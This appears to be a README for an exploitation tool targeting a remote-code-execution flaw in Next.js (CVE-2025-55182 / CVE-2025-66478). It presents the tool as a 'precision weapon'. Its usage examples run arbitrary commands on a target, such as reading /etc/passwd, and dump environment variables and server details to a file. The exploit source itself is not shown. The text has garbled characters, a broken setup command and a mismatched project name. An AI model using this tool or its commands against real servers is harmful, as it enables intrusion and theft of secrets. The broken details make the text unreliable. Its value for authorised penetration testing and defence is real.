## https://sploitus.com/exploit?id=F7E1635F-D256-5507-B45D-5DFE86195CEE
# π React2Shell Exploiter
### Advanced Exploitation & Server Intelligence for CVE-2025-55182 / CVE-2025-66478
> β οΈ **For authorized security testing only.**
> This tool exploits a critical RCE vulnerability in unpatched Next.js applications. Use responsibly and legally.
---
## π Overview
`react2shell-exploit.py` is a precision weapon for **confirmed exploitation** of the **React2Shell** vulnerability (CVE-2025-55182 / CVE-2025-66478). Unlike basic scanners, it:
- β **Executes arbitrary OS commands** on vulnerable Next.js servers.
- β **Dumps comprehensive server intelligence** (OS, user, env vars, processes, etc.).
- β **Detects and extracts outputs** via the `X-Action-Redirect` side-channel.
- β **Supports Linux and Windows** targets.
- β **Saves full forensic data** to `react2shell_dump.json`.
Perfect for **penetration testers**, **bug bounty hunters**, and **red teams** needing proof-of-compromise and post-exploitation context.
---
## π¦ Setup
### Prerequisites
- Python 3.9+
- `git` (to clone the repo)
### Installation
```bash
git clone https://github.com/your-username/react2shell-exploiter.git
cd react2shell-exploiter
./setup.sh
```
> π The `setup.sh` script:
> - Creates a virtual environment (`venv/`)
> - Installs dependencies from `requirements.txt`
#### `requirements.txt`
```txt
requests>=2.28.0
```
---
## βΆοΈ Usage
Use the included `run.sh` wrapper to automatically activate the virtual environment and execute the script.
### Basic Command Execution
```bash
./run.sh react2shell-exploit.py http://target.com -c "id"
```
### Full Server Intelligence (Default Behavior)
```bash
./run.sh react2shell-exploit.py http://target.com
# Executes `id` and dumps full server info
```
### Windows Target
```bash
./run.sh react2shell-exploit.py http://win-target.com --windows -c "whoami"
```
### Custom Paths
```bash
./run.sh react2shell-exploit.py http://target.com --path /_next --path /api
```
### Direct Python Execution (Advanced)
```bash
./run.sh ./react2shell-exploit.py http://target.com -c "cat /etc/passwd"
```
---
## π οΈ Included Scripts
### `setup.sh`
```bash
#!/bin/bash
echo "π§ Setting up VulnQuest virtual environment..."
python3 -/m venv venv
source venv/bin/activate
pip install --upgrade pip
pip install -r requirements.txt
echo "β VulnQuest environment ready!"
```
### `run.sh`
```bash
#!/bin/bash
PROJECT_DIR="$(cd "$(dirname "${BASH_SOURCE[0]}")" && pwd)"
VENV_DIR="$PROJECT_DIR/venv"
if [ ! -d "$VENV_DIR" ]; then
echo "β Run ./setup.sh first!"
exit 1
fi
cleanup() {
echo -e "\nπ Deactivating environment..."
deactivate 2>/dev/null
exit 0
}
trap cleanup EXIT INT TERM
source "$VENV_DIR/bin/activate"
if [[ "$1" == *"/"* ]] || [[ "$1" == *.py ]]; then
python "$@"
else
python -m "$@"
fi
```
> π‘ **Why `run.sh`?**
> Ensures consistent execution within the isolated virtual environmentβno more `ModuleNotFoundError`!
---
## π Output
On successful exploitation, the tool:
- Prints **real-time command output**.
- Displays a **structured server intelligence dump**.
- Saves all data to **`react2shell_dump.json`** for reporting.
Example output:
```
β Command executed successfully on: http://target.com:3000/
[OUTPUT]
ip-http://target.com.compute.internal
π₯οΈ SERVER INFORMATION DUMP
...
πΎ Full dump saved to: react2shell_dump.json
```
---
## β οΈ Ethical & Legal Notice
This tool is **strictly for educational and authorized security testing purposes**.
Unauthorized use against systems you do not own or lack explicit permission to test is **illegal** and violates cybersecurity laws worldwide.
By using this software, you agree to:
- Comply with all applicable laws and regulations.
- Obtain explicit written permission before testing any system.
- Use findings responsibly and report them to the appropriate stakeholders.
---
## π Support
For issues or feature requests, open an issue in the repository.
---
π **Stay sharp. Stay ethical.**
β The React2Shell Exploiter Team
---